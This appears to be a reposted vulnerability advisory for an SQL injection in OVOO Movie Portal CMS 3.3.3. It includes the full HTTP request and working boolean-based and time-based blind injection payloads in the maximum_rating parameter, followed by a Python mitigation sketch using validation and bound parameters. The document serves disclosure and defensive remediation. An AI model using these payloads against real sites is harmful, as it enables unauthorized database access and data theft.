OVOO Movie Portal CMS 3.3.3 SQL Injection

2023.08.23
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

# Exploit Title: OVOO Movie Portal CMS v3.3.3 - SQL Injection
# Date: 2023-08-12
# Exploit Author: Ahmet Ümit BAYRAM
# Vendor: https://codecanyon.net/item/ovoomovie-video-streaming-cms-with-unlimited-tvseries/20180569
# Tested on: Kali Linux & MacOS
# CVE: N/A

### Request ###

POST /filter_movies/1 HTTP/2
Host: localhost
Cookie: ci_session=tiic5hcli8v3qkg1chgj0dqpou9495us
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/116.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://localhost/movies.html
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 60
Origin: htts://localhost
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers

action=fetch_data&minimum_rating=1&maximum_rating=6.8&page=1

### Parameter & Payloads ###

Parameter: maximum_rating (POST)

Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: action=fetch_data&minimum_rating=1&maximum_rating=6.8 AND 2238=2238&page=1

Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: action=fetch_data&minimum_rating=1&maximum_rating=6.8 AND (SELECT 4101 FROM (SELECT(SLEEP(5)))FLwc)&page=1
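
Mitigation sketch for the maximum_rating finding above, added here as an example; it is not OVOO's code and not part of the original advisory. It validates both rating fields as plain decimals and binds them as query parameters. Assumptions: a 0-10 rating scale, hypothetical table and column names, constructed sample rows, and SQLite standing in for the MySQL back end.

```python
import re
import sqlite3
from urllib.parse import parse_qs

# Assumption: ratings are decimals on a 0-10 scale (the request above sends 1 and 6.8).
RATING_RE = re.compile(r"(?:10(?:\.0{1,2})?|[0-9](?:\.[0-9]{1,2})?)")

def parse_rating(raw):
    """Return the rating as a float; raise ValueError for anything but a plain decimal."""
    if not RATING_RE.fullmatch(raw):
        raise ValueError(f"rejected rating value: {raw!r}")
    return float(raw)

def filter_movies(conn, body):
    """Handle a filter_movies form body: validate both ratings, then bind them."""
    form = parse_qs(body, keep_blank_values=True)
    low = parse_rating(form.get("minimum_rating", [""])[0])
    high = parse_rating(form.get("maximum_rating", [""])[0])
    # Placeholders keep request values out of the SQL text entirely.
    rows = conn.execute(
        "SELECT title FROM movies WHERE rating BETWEEN ? AND ? ORDER BY title",
        (low, high),
    )
    return [title for (title,) in rows]

def demo_db():
    """Constructed sample data; table and column names are hypothetical."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE movies (title TEXT, rating REAL)")
    conn.executemany(
        "INSERT INTO movies VALUES (?, ?)",
        [("Alpha", 5.5), ("Bravo", 6.8), ("Charlie", 9.1)],
    )
    return conn

if __name__ == "__main__":
    conn = demo_db()
    template = "action=fetch_data&minimum_rating=1&maximum_rating={}&page=1"
    print(filter_movies(conn, template.format("6.8")))
    # The two maximum_rating values listed in the advisory are rejected before any SQL runs.
    for value in ("6.8 AND 2238=2238",
                  "6.8 AND (SELECT 4101 FROM (SELECT(SLEEP(5)))FLwc)"):
        try:
            filter_movies(conn, template.format(value))
        except ValueError as exc:
            print(exc)
```

Rejected values are worth logging with the client address: a non-numeric rating on this endpoint is a reliable signal of probing.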



Copyright 2024, cxsecurity.com

 
